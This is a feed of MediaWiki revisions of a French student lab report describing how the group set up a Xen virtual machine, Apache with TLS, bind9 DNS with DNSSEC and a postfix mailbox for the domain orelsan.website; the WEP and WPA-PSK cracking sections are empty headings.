===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35644</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35644"/>
				<updated>2016-12-06T09:19:10Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Installation boite mail&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Générer une demande de certificat en SHA 2&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; DNSSEC &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé WEP ==&lt;br /&gt;
&lt;br /&gt;
== Cassage clé WPA-PSK ==&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35643</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35643"/>
				<updated>2016-12-06T09:15:47Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
